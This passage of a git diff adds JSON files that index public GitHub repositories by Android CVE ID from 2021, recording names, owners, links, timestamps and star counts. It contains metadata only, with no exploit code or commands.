+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 685410174,
+ "name": "platform_art_CVE-2021-0394",
+ "full_name": "Trinadh465\/platform_art_CVE-2021-0394",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_art_CVE-2021-0394",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-31T07:00:49Z",
+ "updated_at": "2023-08-31T07:02:47Z",
+ "pushed_at": "2023-08-31T07:03:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0396.json b/2021/CVE-2021-0396.json
new file mode 100644
index 0000000000..436e0a2dd6
--- /dev/null
+++ b/2021/CVE-2021-0396.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486848599,
+ "name": "external_v8_AOSP10_r33_CVE-2021-0396",
+ "full_name": "Satheesh575555\/external_v8_AOSP10_r33_CVE-2021-0396",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/external_v8_AOSP10_r33_CVE-2021-0396",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T05:28:48Z",
+ "updated_at": "2023-04-17T01:15:01Z",
+ "pushed_at": "2023-02-17T11:14:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0397.json b/2021/CVE-2021-0397.json
new file mode 100644
index 0000000000..b0580eb162
--- /dev/null
+++ b/2021/CVE-2021-0397.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476561257,
+ "name": "System_bt_AOSP10-r33_CVE-2021-0397",
+ "full_name": "Satheesh575555\/System_bt_AOSP10-r33_CVE-2021-0397",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/System_bt_AOSP10-r33_CVE-2021-0397",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-01T03:31:38Z",
+ "updated_at": "2023-08-29T13:42:11Z",
+ "pushed_at": "2022-04-01T03:35:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0399.json b/2021/CVE-2021-0399.json
new file mode 100644
index 0000000000..e4f41e4488
--- /dev/null
+++ b/2021/CVE-2021-0399.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 614249457,
+ "name": "Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-",
+ "full_name": "nipund513\/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-",
+ "owner": {
+ "login": "nipund513",
+ "id": 81982865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81982865?v=4",
+ "html_url": "https:\/\/github.com\/nipund513"
+ },
+ "html_url": "https:\/\/github.com\/nipund513\/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-15T07:52:05Z",
+ "updated_at": "2023-03-15T07:52:05Z",
+ "pushed_at": "2023-03-15T07:54:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0431.json b/2021/CVE-2021-0431.json
new file mode 100644
index 0000000000..fb5e9b8279
--- /dev/null
+++ b/2021/CVE-2021-0431.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 483943224,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0431",
+ "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0431",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0431",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T07:05:53Z",
+ "updated_at": "2022-04-21T07:09:05Z",
+ "pushed_at": "2022-04-21T07:09:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 483947573,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0431",
+ "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0431",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0431",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T07:20:59Z",
+ "updated_at": "2022-04-21T07:28:16Z",
+ "pushed_at": "2022-04-21T07:29:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0433.json b/2021/CVE-2021-0433.json
new file mode 100644
index 0000000000..f836823392
--- /dev/null
+++ b/2021/CVE-2021-0433.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483637216,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0433",
+ "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0433",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0433",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-20T12:03:35Z",
+ "updated_at": "2023-03-27T01:41:33Z",
+ "pushed_at": "2022-04-20T12:15:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0435.json b/2021/CVE-2021-0435.json
new file mode 100644
index 0000000000..93a0e334ce
--- /dev/null
+++ b/2021/CVE-2021-0435.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 483935047,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0435",
+ "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0435",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0435",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T06:37:09Z",
+ "updated_at": "2022-04-21T06:50:39Z",
+ "pushed_at": "2022-04-21T06:51:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 483939916,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0435",
+ "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0435",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0435",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T06:54:34Z",
+ "updated_at": "2022-04-21T06:58:25Z",
+ "pushed_at": "2022-04-21T06:59:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0437.json b/2021/CVE-2021-0437.json
new file mode 100644
index 0000000000..2819a9a489
--- /dev/null
+++ b/2021/CVE-2021-0437.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484009104,
+ "name": "frameworks_av_AOSP10_r33_CVE-2021-0437",
+ "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0437",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0437",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T10:37:06Z",
+ "updated_at": "2022-04-21T10:44:14Z",
+ "pushed_at": "2022-04-21T10:45:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0466.json b/2021/CVE-2021-0466.json
new file mode 100644
index 0000000000..8b4c557552
--- /dev/null
+++ b/2021/CVE-2021-0466.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816750527,
+ "name": "frameworks_opt_net_wifi_CVE-2021-0466",
+ "full_name": "uthrasri\/frameworks_opt_net_wifi_CVE-2021-0466",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/frameworks_opt_net_wifi_CVE-2021-0466",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T10:34:34Z",
+ "updated_at": "2024-06-19T13:20:29Z",
+ "pushed_at": "2024-06-18T14:31:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0472.json b/2021/CVE-2021-0472.json
new file mode 100644
index 0000000000..5d4567ba8c
--- /dev/null
+++ b/2021/CVE-2021-0472.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476366397,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0472",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0472",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0472",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-31T15:28:01Z",
+ "updated_at": "2022-04-01T02:30:35Z",
+ "pushed_at": "2022-03-31T15:38:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0474.json b/2021/CVE-2021-0474.json
new file mode 100644
index 0000000000..358796c8fa
--- /dev/null
+++ b/2021/CVE-2021-0474.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 483662110,
+ "name": "system_bt_A10-r33_CVE-2021-0474",
+ "full_name": "pazhanivel07\/system_bt_A10-r33_CVE-2021-0474",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/system_bt_A10-r33_CVE-2021-0474",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-20T13:17:24Z",
+ "updated_at": "2023-09-15T19:54:58Z",
+ "pushed_at": "2022-04-21T06:35:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 483948194,
+ "name": "system_bt_A10_r33_CVE-2021-0474",
+ "full_name": "pazhanivel07\/system_bt_A10_r33_CVE-2021-0474",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/system_bt_A10_r33_CVE-2021-0474",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T07:22:59Z",
+ "updated_at": "2022-04-21T07:26:18Z",
+ "pushed_at": "2022-04-21T07:27:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0475.json b/2021/CVE-2021-0475.json
new file mode 100644
index 0000000000..f31b9668c9
--- /dev/null
+++ b/2021/CVE-2021-0475.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483536184,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0475",
+ "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0475",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0475",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-20T06:36:43Z",
+ "updated_at": "2022-04-20T06:45:49Z",
+ "pushed_at": "2022-04-20T06:47:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0476.json b/2021/CVE-2021-0476.json
new file mode 100644
index 0000000000..39abcd5701
--- /dev/null
+++ b/2021/CVE-2021-0476.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 477595432,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0476",
+ "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0476",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0476",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-04T07:35:45Z",
+ "updated_at": "2022-04-04T07:50:01Z",
+ "pushed_at": "2022-04-04T07:50:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0478.json b/2021/CVE-2021-0478.json
new file mode 100644
index 0000000000..4122b2f158
--- /dev/null
+++ b/2021/CVE-2021-0478.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 482818616,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0478",
+ "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0478",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0478",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-18T11:16:45Z",
+ "updated_at": "2023-03-27T01:35:15Z",
+ "pushed_at": "2022-04-18T11:22:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0481.json b/2021/CVE-2021-0481.json
new file mode 100644
index 0000000000..7283c72b7d
--- /dev/null
+++ b/2021/CVE-2021-0481.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484368544,
+ "name": "packages_apps_settings_AOSP10_r33_CVE-2021-0481",
+ "full_name": "ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2021-0481",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2021-0481",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T09:10:38Z",
+ "updated_at": "2022-04-22T10:05:57Z",
+ "pushed_at": "2022-04-22T10:06:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0506.json b/2021/CVE-2021-0506.json
new file mode 100644
index 0000000000..732b0dabbc
--- /dev/null
+++ b/2021/CVE-2021-0506.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480771917,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0506",
+ "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0506",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0506",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-12T11:02:00Z",
+ "updated_at": "2023-03-27T01:49:18Z",
+ "pushed_at": "2022-04-12T11:05:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0507.json b/2021/CVE-2021-0507.json
new file mode 100644
index 0000000000..fd471d05c6
--- /dev/null
+++ b/2021/CVE-2021-0507.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 479956793,
+ "name": "system_bt_AOSP10_r33_CVE-2021-0507",
+ "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0507",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0507",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-10T08:26:52Z",
+ "updated_at": "2022-04-10T08:31:35Z",
+ "pushed_at": "2022-04-10T08:32:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0508.json b/2021/CVE-2021-0508.json
new file mode 100644
index 0000000000..a9b283b4c1
--- /dev/null
+++ b/2021/CVE-2021-0508.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483964254,
+ "name": "frameworks_av_AOSP10_r33_CVE-2021-0508",
+ "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0508",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0508",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T08:15:00Z",
+ "updated_at": "2022-04-21T08:28:19Z",
+ "pushed_at": "2022-04-21T08:28:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0509.json b/2021/CVE-2021-0509.json
new file mode 100644
index 0000000000..719e38b2ef
--- /dev/null
+++ b/2021/CVE-2021-0509.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483931356,
+ "name": "frameworks_av_AOSP10_r33_CVE-2021-0509",
+ "full_name": "Trinadh465\/frameworks_av_AOSP10_r33_CVE-2021-0509",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_av_AOSP10_r33_CVE-2021-0509",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T06:23:26Z",
+ "updated_at": "2023-03-23T01:17:11Z",
+ "pushed_at": "2022-04-21T06:35:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0510.json b/2021/CVE-2021-0510.json
new file mode 100644
index 0000000000..224a32cfc0
--- /dev/null
+++ b/2021/CVE-2021-0510.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483645707,
+ "name": "hardware_interfaces-A10_r33_CVE-2021-0510",
+ "full_name": "pazhanivel07\/hardware_interfaces-A10_r33_CVE-2021-0510",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/hardware_interfaces-A10_r33_CVE-2021-0510",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-20T12:29:25Z",
+ "updated_at": "2022-04-20T12:32:50Z",
+ "pushed_at": "2022-04-20T12:33:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0511.json b/2021/CVE-2021-0511.json
new file mode 100644
index 0000000000..a84e87e72a
--- /dev/null
+++ b/2021/CVE-2021-0511.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 487194778,
+ "name": "platform_art_AOSP10_r33_CVE-2021-0511",
+ "full_name": "Trinadh465\/platform_art_AOSP10_r33_CVE-2021-0511",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_art_AOSP10_r33_CVE-2021-0511",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-30T05:54:11Z",
+ "updated_at": "2022-04-30T05:57:05Z",
+ "pushed_at": "2022-04-30T05:58:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0513.json b/2021/CVE-2021-0513.json
new file mode 100644
index 0000000000..8b36bb2649
--- /dev/null
+++ b/2021/CVE-2021-0513.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484659915,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0513",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0513",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0513",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T05:50:23Z",
+ "updated_at": "2022-04-23T06:23:48Z",
+ "pushed_at": "2022-04-23T06:23:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
